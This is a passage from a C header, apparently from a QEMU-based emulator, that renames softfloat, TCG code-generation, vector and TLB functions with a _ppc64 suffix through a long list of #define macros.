floatx80_round_ppc64 #define floatx80_round_to_int floatx80_round_to_int_ppc64 #define floatx80_add floatx80_add_ppc64 #define floatx80_sub floatx80_sub_ppc64 #define floatx80_mul floatx80_mul_ppc64 #define floatx80_div floatx80_div_ppc64 #define floatx80_rem floatx80_rem_ppc64 #define floatx80_sqrt floatx80_sqrt_ppc64 #define floatx80_eq floatx80_eq_ppc64 #define floatx80_le floatx80_le_ppc64 #define floatx80_lt floatx80_lt_ppc64 #define floatx80_unordered floatx80_unordered_ppc64 #define floatx80_eq_quiet floatx80_eq_quiet_ppc64 #define floatx80_le_quiet floatx80_le_quiet_ppc64 #define floatx80_lt_quiet floatx80_lt_quiet_ppc64 #define floatx80_unordered_quiet floatx80_unordered_quiet_ppc64 #define float128_to_int32 float128_to_int32_ppc64 #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_ppc64 #define float128_to_int64 float128_to_int64_ppc64 #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_ppc64 #define float128_to_uint64 float128_to_uint64_ppc64 #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_ppc64 #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_ppc64 #define float128_to_uint32 float128_to_uint32_ppc64 #define float128_to_float32 float128_to_float32_ppc64 #define float128_to_float64 float128_to_float64_ppc64 #define float128_to_floatx80 float128_to_floatx80_ppc64 #define float128_round_to_int float128_round_to_int_ppc64 #define float128_add float128_add_ppc64 #define float128_sub float128_sub_ppc64 #define float128_mul float128_mul_ppc64 #define float128_div float128_div_ppc64 #define float128_rem float128_rem_ppc64 #define float128_sqrt float128_sqrt_ppc64 #define float128_eq float128_eq_ppc64 #define float128_le float128_le_ppc64 #define float128_lt float128_lt_ppc64 #define float128_unordered float128_unordered_ppc64 #define float128_eq_quiet float128_eq_quiet_ppc64 #define float128_le_quiet float128_le_quiet_ppc64 #define float128_lt_quiet float128_lt_quiet_ppc64 #define float128_unordered_quiet 
float128_unordered_quiet_ppc64 #define floatx80_compare floatx80_compare_ppc64 #define floatx80_compare_quiet floatx80_compare_quiet_ppc64 #define float128_compare float128_compare_ppc64 #define float128_compare_quiet float128_compare_quiet_ppc64 #define floatx80_scalbn floatx80_scalbn_ppc64 #define float128_scalbn float128_scalbn_ppc64 #define softfloat_init softfloat_init_ppc64 #define tcg_optimize tcg_optimize_ppc64 #define gen_new_label gen_new_label_ppc64 #define tcg_can_emit_vec_op tcg_can_emit_vec_op_ppc64 #define tcg_expand_vec_op tcg_expand_vec_op_ppc64 #define tcg_register_jit tcg_register_jit_ppc64 #define tcg_tb_insert tcg_tb_insert_ppc64 #define tcg_tb_remove tcg_tb_remove_ppc64 #define tcg_tb_lookup tcg_tb_lookup_ppc64 #define tcg_tb_foreach tcg_tb_foreach_ppc64 #define tcg_nb_tbs tcg_nb_tbs_ppc64 #define tcg_region_reset_all tcg_region_reset_all_ppc64 #define tcg_region_init tcg_region_init_ppc64 #define tcg_code_size tcg_code_size_ppc64 #define tcg_code_capacity tcg_code_capacity_ppc64 #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_ppc64 #define tcg_malloc_internal tcg_malloc_internal_ppc64 #define tcg_pool_reset tcg_pool_reset_ppc64 #define tcg_context_init tcg_context_init_ppc64 #define tcg_tb_alloc tcg_tb_alloc_ppc64 #define tcg_prologue_init tcg_prologue_init_ppc64 #define tcg_func_start tcg_func_start_ppc64 #define tcg_set_frame tcg_set_frame_ppc64 #define tcg_global_mem_new_internal tcg_global_mem_new_internal_ppc64 #define tcg_temp_new_internal tcg_temp_new_internal_ppc64 #define tcg_temp_new_vec tcg_temp_new_vec_ppc64 #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_ppc64 #define tcg_temp_free_internal tcg_temp_free_internal_ppc64 #define tcg_const_i32 tcg_const_i32_ppc64 #define tcg_const_i64 tcg_const_i64_ppc64 #define tcg_const_local_i32 tcg_const_local_i32_ppc64 #define tcg_const_local_i64 tcg_const_local_i64_ppc64 #define tcg_op_supported tcg_op_supported_ppc64 #define tcg_gen_callN tcg_gen_callN_ppc64 #define tcg_op_remove tcg_op_remove_ppc64 #define tcg_emit_op tcg_emit_op_ppc64 #define tcg_op_insert_before tcg_op_insert_before_ppc64 #define tcg_op_insert_after tcg_op_insert_after_ppc64 #define tcg_cpu_exec_time tcg_cpu_exec_time_ppc64 #define tcg_gen_code tcg_gen_code_ppc64 #define tcg_gen_op1 tcg_gen_op1_ppc64 #define tcg_gen_op2 tcg_gen_op2_ppc64 #define tcg_gen_op3 tcg_gen_op3_ppc64 #define tcg_gen_op4 tcg_gen_op4_ppc64 #define tcg_gen_op5 tcg_gen_op5_ppc64 #define tcg_gen_op6 tcg_gen_op6_ppc64 #define tcg_gen_mb tcg_gen_mb_ppc64 #define tcg_gen_addi_i32 tcg_gen_addi_i32_ppc64 #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_ppc64 #define tcg_gen_subi_i32 tcg_gen_subi_i32_ppc64 #define tcg_gen_andi_i32 tcg_gen_andi_i32_ppc64 #define tcg_gen_ori_i32 tcg_gen_ori_i32_ppc64 #define tcg_gen_xori_i32 tcg_gen_xori_i32_ppc64 #define tcg_gen_shli_i32 tcg_gen_shli_i32_ppc64 #define tcg_gen_shri_i32 tcg_gen_shri_i32_ppc64 #define tcg_gen_sari_i32 tcg_gen_sari_i32_ppc64 #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_ppc64 #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_ppc64 #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_ppc64 #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_ppc64 #define tcg_gen_muli_i32 tcg_gen_muli_i32_ppc64 #define tcg_gen_div_i32 tcg_gen_div_i32_ppc64 #define tcg_gen_rem_i32 tcg_gen_rem_i32_ppc64 #define tcg_gen_divu_i32 tcg_gen_divu_i32_ppc64 #define tcg_gen_remu_i32 tcg_gen_remu_i32_ppc64 #define tcg_gen_andc_i32 tcg_gen_andc_i32_ppc64 #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_ppc64 #define tcg_gen_nand_i32 
tcg_gen_nand_i32_ppc64 #define tcg_gen_nor_i32 tcg_gen_nor_i32_ppc64 #define tcg_gen_orc_i32 tcg_gen_orc_i32_ppc64 #define tcg_gen_clz_i32 tcg_gen_clz_i32_ppc64 #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_ppc64 #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_ppc64 #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_ppc64 #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_ppc64 #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_ppc64 #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_ppc64 #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_ppc64 #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_ppc64 #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_ppc64 #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_ppc64 #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_ppc64 #define tcg_gen_extract_i32 tcg_gen_extract_i32_ppc64 #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_ppc64 #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_ppc64 #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_ppc64 #define tcg_gen_add2_i32 tcg_gen_add2_i32_ppc64 #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_ppc64 #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_ppc64 #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_ppc64 #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_ppc64 #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_ppc64 #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_ppc64 #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_ppc64 #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_ppc64 #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_ppc64 #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_ppc64 #define tcg_gen_smin_i32 tcg_gen_smin_i32_ppc64 #define tcg_gen_umin_i32 tcg_gen_umin_i32_ppc64 #define tcg_gen_smax_i32 tcg_gen_smax_i32_ppc64 #define tcg_gen_umax_i32 tcg_gen_umax_i32_ppc64 #define tcg_gen_abs_i32 tcg_gen_abs_i32_ppc64 #define tcg_gen_addi_i64 tcg_gen_addi_i64_ppc64 #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_ppc64 #define tcg_gen_subi_i64 tcg_gen_subi_i64_ppc64 #define tcg_gen_andi_i64 tcg_gen_andi_i64_ppc64 #define tcg_gen_ori_i64 tcg_gen_ori_i64_ppc64 #define tcg_gen_xori_i64 tcg_gen_xori_i64_ppc64 #define tcg_gen_shli_i64 tcg_gen_shli_i64_ppc64 #define tcg_gen_shri_i64 tcg_gen_shri_i64_ppc64 #define tcg_gen_sari_i64 tcg_gen_sari_i64_ppc64 #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_ppc64 #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_ppc64 #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_ppc64 #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_ppc64 #define tcg_gen_muli_i64 tcg_gen_muli_i64_ppc64 #define tcg_gen_div_i64 tcg_gen_div_i64_ppc64 #define tcg_gen_rem_i64 tcg_gen_rem_i64_ppc64 #define tcg_gen_divu_i64 tcg_gen_divu_i64_ppc64 #define tcg_gen_remu_i64 tcg_gen_remu_i64_ppc64 #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_ppc64 #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_ppc64 #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_ppc64 #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_ppc64 #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_ppc64 #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_ppc64 #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_ppc64 #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_ppc64 #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_ppc64 #define tcg_gen_not_i64 tcg_gen_not_i64_ppc64 #define tcg_gen_andc_i64 tcg_gen_andc_i64_ppc64 #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_ppc64 #define tcg_gen_nand_i64 tcg_gen_nand_i64_ppc64 #define tcg_gen_nor_i64 tcg_gen_nor_i64_ppc64 #define tcg_gen_orc_i64 tcg_gen_orc_i64_ppc64 #define tcg_gen_clz_i64 tcg_gen_clz_i64_ppc64 #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_ppc64 #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_ppc64 #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_ppc64 
#define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_ppc64 #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_ppc64 #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_ppc64 #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_ppc64 #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_ppc64 #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_ppc64 #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_ppc64 #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_ppc64 #define tcg_gen_extract_i64 tcg_gen_extract_i64_ppc64 #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_ppc64 #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_ppc64 #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_ppc64 #define tcg_gen_add2_i64 tcg_gen_add2_i64_ppc64 #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_ppc64 #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_ppc64 #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_ppc64 #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_ppc64 #define tcg_gen_smin_i64 tcg_gen_smin_i64_ppc64 #define tcg_gen_umin_i64 tcg_gen_umin_i64_ppc64 #define tcg_gen_smax_i64 tcg_gen_smax_i64_ppc64 #define tcg_gen_umax_i64 tcg_gen_umax_i64_ppc64 #define tcg_gen_abs_i64 tcg_gen_abs_i64_ppc64 #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_ppc64 #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_ppc64 #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_ppc64 #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_ppc64 #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_ppc64 #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_ppc64 #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_ppc64 #define tcg_gen_exit_tb tcg_gen_exit_tb_ppc64 #define tcg_gen_goto_tb tcg_gen_goto_tb_ppc64 #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_ppc64 #define check_exit_request check_exit_request_ppc64 #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_ppc64 #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_ppc64 #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_ppc64 #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_ppc64 #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_ppc64 #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_ppc64 #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_ppc64 #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_ppc64 #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_ppc64 #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_ppc64 #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_ppc64 #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_ppc64 #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_ppc64 #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_ppc64 #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_ppc64 #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_ppc64 #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_ppc64 #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_ppc64 #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_ppc64 #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_ppc64 #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_ppc64 #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_ppc64 #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_ppc64 #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_ppc64 #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_ppc64 #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_ppc64 #define 
tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_ppc64 #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_ppc64 #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_ppc64 #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_ppc64 #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_ppc64 #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_ppc64 #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_ppc64 #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_ppc64 #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_ppc64 #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_ppc64 #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_ppc64 #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_ppc64 #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_ppc64 #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_ppc64 #define simd_desc simd_desc_ppc64 #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_ppc64 #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_ppc64 #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_ppc64 #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_ppc64 #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_ppc64 #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_ppc64 #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_ppc64 #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_ppc64 #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_ppc64 #define tcg_gen_gvec_2 tcg_gen_gvec_2_ppc64 #define tcg_gen_gvec_2i tcg_gen_gvec_2i_ppc64 #define tcg_gen_gvec_2s tcg_gen_gvec_2s_ppc64 #define tcg_gen_gvec_3 tcg_gen_gvec_3_ppc64 #define tcg_gen_gvec_3i tcg_gen_gvec_3i_ppc64 #define tcg_gen_gvec_4 tcg_gen_gvec_4_ppc64 #define tcg_gen_gvec_mov tcg_gen_gvec_mov_ppc64 #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_ppc64 #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_ppc64 #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_ppc64 #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_ppc64 #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_ppc64 #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_ppc64 #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_ppc64 #define tcg_gen_gvec_not tcg_gen_gvec_not_ppc64 #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_ppc64 #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_ppc64 #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_ppc64 #define tcg_gen_gvec_add tcg_gen_gvec_add_ppc64 #define tcg_gen_gvec_adds tcg_gen_gvec_adds_ppc64 #define tcg_gen_gvec_addi tcg_gen_gvec_addi_ppc64 #define tcg_gen_gvec_subs tcg_gen_gvec_subs_ppc64 #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_ppc64 #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_ppc64 #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_ppc64 #define tcg_gen_gvec_sub tcg_gen_gvec_sub_ppc64 #define tcg_gen_gvec_mul tcg_gen_gvec_mul_ppc64 #define tcg_gen_gvec_muls tcg_gen_gvec_muls_ppc64 #define tcg_gen_gvec_muli tcg_gen_gvec_muli_ppc64 #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_ppc64 #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_ppc64 #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_ppc64 #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_ppc64 #define tcg_gen_gvec_smin tcg_gen_gvec_smin_ppc64 #define tcg_gen_gvec_umin tcg_gen_gvec_umin_ppc64 #define tcg_gen_gvec_smax tcg_gen_gvec_smax_ppc64 #define tcg_gen_gvec_umax tcg_gen_gvec_umax_ppc64 #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_ppc64 #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_ppc64 #define tcg_gen_vec_neg32_i64 
tcg_gen_vec_neg32_i64_ppc64 #define tcg_gen_gvec_neg tcg_gen_gvec_neg_ppc64 #define tcg_gen_gvec_abs tcg_gen_gvec_abs_ppc64 #define tcg_gen_gvec_and tcg_gen_gvec_and_ppc64 #define tcg_gen_gvec_or tcg_gen_gvec_or_ppc64 #define tcg_gen_gvec_xor tcg_gen_gvec_xor_ppc64 #define tcg_gen_gvec_andc tcg_gen_gvec_andc_ppc64 #define tcg_gen_gvec_orc tcg_gen_gvec_orc_ppc64 #define tcg_gen_gvec_nand tcg_gen_gvec_nand_ppc64 #define tcg_gen_gvec_nor tcg_gen_gvec_nor_ppc64 #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_ppc64 #define tcg_gen_gvec_ands tcg_gen_gvec_ands_ppc64 #define tcg_gen_gvec_andi tcg_gen_gvec_andi_ppc64 #define tcg_gen_gvec_xors tcg_gen_gvec_xors_ppc64 #define tcg_gen_gvec_xori tcg_gen_gvec_xori_ppc64 #define tcg_gen_gvec_ors tcg_gen_gvec_ors_ppc64 #define tcg_gen_gvec_ori tcg_gen_gvec_ori_ppc64 #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_ppc64 #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_ppc64 #define tcg_gen_gvec_shli tcg_gen_gvec_shli_ppc64 #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_ppc64 #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_ppc64 #define tcg_gen_gvec_shri tcg_gen_gvec_shri_ppc64 #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_ppc64 #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_ppc64 #define tcg_gen_gvec_sari tcg_gen_gvec_sari_ppc64 #define tcg_gen_gvec_shls tcg_gen_gvec_shls_ppc64 #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_ppc64 #define tcg_gen_gvec_sars tcg_gen_gvec_sars_ppc64 #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_ppc64 #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_ppc64 #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_ppc64 #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_ppc64 #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_ppc64 #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_ppc64 #define vec_gen_2 vec_gen_2_ppc64 #define vec_gen_3 vec_gen_3_ppc64 #define vec_gen_4 vec_gen_4_ppc64 #define tcg_gen_mov_vec tcg_gen_mov_vec_ppc64 #define tcg_const_zeros_vec tcg_const_zeros_vec_ppc64 #define tcg_const_ones_vec tcg_const_ones_vec_ppc64 #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_ppc64 #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_ppc64 #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_ppc64 #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_ppc64 #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_ppc64 #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_ppc64 #define tcg_gen_dupi_vec tcg_gen_dupi_vec_ppc64 #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_ppc64 #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_ppc64 #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_ppc64 #define tcg_gen_ld_vec tcg_gen_ld_vec_ppc64 #define tcg_gen_st_vec tcg_gen_st_vec_ppc64 #define tcg_gen_stl_vec tcg_gen_stl_vec_ppc64 #define tcg_gen_and_vec tcg_gen_and_vec_ppc64 #define tcg_gen_or_vec tcg_gen_or_vec_ppc64 #define tcg_gen_xor_vec tcg_gen_xor_vec_ppc64 #define tcg_gen_andc_vec tcg_gen_andc_vec_ppc64 #define tcg_gen_orc_vec tcg_gen_orc_vec_ppc64 #define tcg_gen_nand_vec tcg_gen_nand_vec_ppc64 #define tcg_gen_nor_vec tcg_gen_nor_vec_ppc64 #define tcg_gen_eqv_vec tcg_gen_eqv_vec_ppc64 #define tcg_gen_not_vec tcg_gen_not_vec_ppc64 #define tcg_gen_neg_vec tcg_gen_neg_vec_ppc64 #define tcg_gen_abs_vec tcg_gen_abs_vec_ppc64 #define tcg_gen_shli_vec tcg_gen_shli_vec_ppc64 #define tcg_gen_shri_vec tcg_gen_shri_vec_ppc64 #define tcg_gen_sari_vec tcg_gen_sari_vec_ppc64 #define tcg_gen_cmp_vec tcg_gen_cmp_vec_ppc64 #define tcg_gen_add_vec tcg_gen_add_vec_ppc64 #define tcg_gen_sub_vec tcg_gen_sub_vec_ppc64 #define tcg_gen_mul_vec 
tcg_gen_mul_vec_ppc64 #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_ppc64 #define tcg_gen_usadd_vec tcg_gen_usadd_vec_ppc64 #define tcg_gen_sssub_vec tcg_gen_sssub_vec_ppc64 #define tcg_gen_ussub_vec tcg_gen_ussub_vec_ppc64 #define tcg_gen_smin_vec tcg_gen_smin_vec_ppc64 #define tcg_gen_umin_vec tcg_gen_umin_vec_ppc64 #define tcg_gen_smax_vec tcg_gen_smax_vec_ppc64 #define tcg_gen_umax_vec tcg_gen_umax_vec_ppc64 #define tcg_gen_shlv_vec tcg_gen_shlv_vec_ppc64 #define tcg_gen_shrv_vec tcg_gen_shrv_vec_ppc64 #define tcg_gen_sarv_vec tcg_gen_sarv_vec_ppc64 #define tcg_gen_shls_vec tcg_gen_shls_vec_ppc64 #define tcg_gen_shrs_vec tcg_gen_shrs_vec_ppc64 #define tcg_gen_sars_vec tcg_gen_sars_vec_ppc64 #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_ppc64 #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_ppc64 #define tb_htable_lookup tb_htable_lookup_ppc64 #define tb_set_jmp_target tb_set_jmp_target_ppc64 #define cpu_exec cpu_exec_ppc64 #define cpu_loop_exit_noexc cpu_loop_exit_noexc_ppc64 #define cpu_reloading_memory_map cpu_reloading_memory_map_ppc64 #define cpu_loop_exit cpu_loop_exit_ppc64 #define cpu_loop_exit_restore cpu_loop_exit_restore_ppc64 #define cpu_loop_exit_atomic cpu_loop_exit_atomic_ppc64 #define tlb_init tlb_init_ppc64 #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_ppc64 #define tlb_flush tlb_flush_ppc64 #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_ppc64 #define tlb_flush_all_cpus tlb_flush_all_cpus_ppc64 #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_ppc64 #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_ppc64 #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_ppc64 #define tlb_flush_page tlb_flush_page_ppc64 #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_ppc64 #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_ppc64 #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_ppc64 #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_ppc64 #define tlb_protect_code tlb_protect_code_ppc64 #define tlb_unprotect_code tlb_unprotect_code_ppc64 #define tlb_reset_dirty tlb_reset_dirty_ppc64 #define tlb_set_dirty tlb_set_dirty_ppc64 #define tlb_set_page_with_attrs tlb_set_page_with_attrs_ppc64 #define tlb_set_page tlb_set_page_ppc64 #define get_page_addr_code_hostp get_page_addr_code_hostp_ppc64 #define get_page_addr_code get_page_addr_code_ppc64 #define probe_access probe_access_ppc64 #define tlb_vaddr_to_host tlb_vaddr_to_host_ppc64 #define helper_ret_ldub_mmu helper_ret_ldub_mmu_ppc64 #define helper_le_lduw_mmu helper_le_lduw_mmu_ppc64 #define helper_be_lduw_mmu helper_be_lduw_mmu_ppc64 #define helper_le_ldul_mmu helper_le_ldul_mmu_ppc64 #define helper_be_ldul_mmu helper_be_ldul_mmu_ppc64 #define helper_le_ldq_mmu helper_le_ldq_mmu_ppc64 #define helper_be_ldq_mmu helper_be_ldq_mmu_ppc64 #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_ppc64 #define helper_le_ldsw_mmu helper_le_ldsw_mmu_ppc64 #define helper_be_ldsw_mmu helper_be_ldsw_mmu_ppc64 #define helper_le_ldsl_mmu helper_le_ldsl_mmu_ppc64 #define helper_be_ldsl_mmu helper_be_ldsl_mmu_ppc64 #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_ppc64 #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_ppc64 #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_ppc64 #define cpu_ldsw_mmuidx_ra 